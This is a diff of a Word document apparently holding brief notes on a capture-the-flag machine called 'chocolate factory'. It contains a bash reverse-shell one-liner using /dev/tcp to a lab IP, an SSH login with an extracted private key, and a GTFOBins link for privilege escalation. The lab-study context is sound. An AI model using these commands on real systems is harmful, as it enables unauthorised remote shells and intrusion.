--- a/VM/6.choclate factory.docx
+++ b/VM/6.choclate factory.docx
@@ -19,10 +19,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>bash -c 'exec bash -i &amp;&gt;/dev/tcp/10.8.198.86/1337 &lt;&amp;1'</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">    (execute command )</w:t>
+        <w:t>bash -c 'exec bash -i &amp;&gt;/dev/tcp/10.8.198.86/1337 &lt;&amp;1'    (execute command )</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -43,6 +40,9 @@
       <w:r>
         <w:t>strings key_rev_key</w:t>
       </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
@@ -51,7 +51,15 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t>ssh charlie@10.10.240.128 -i sshkey</w:t>
+        <w:t>Chmod 400 id_rsa</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">ssh charlie@10.10.240.128 -i </w:t>
+      </w:r>
+      <w:r>
+        <w:t>id_rsa</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -68,19 +76,7 @@
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
           </w:rPr>
-          <w:t>https://gtfob</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>i</w:t>
-        </w:r>
-        <w:r>
-          <w:rPr>
-            <w:rStyle w:val="Hyperlink"/>
-          </w:rPr>
-          <w:t>ns.github.io/</w:t>
+          <w:t>https://gtfobins.github.io/</w:t>
         </w:r>
       </w:hyperlink>
     </w:p>
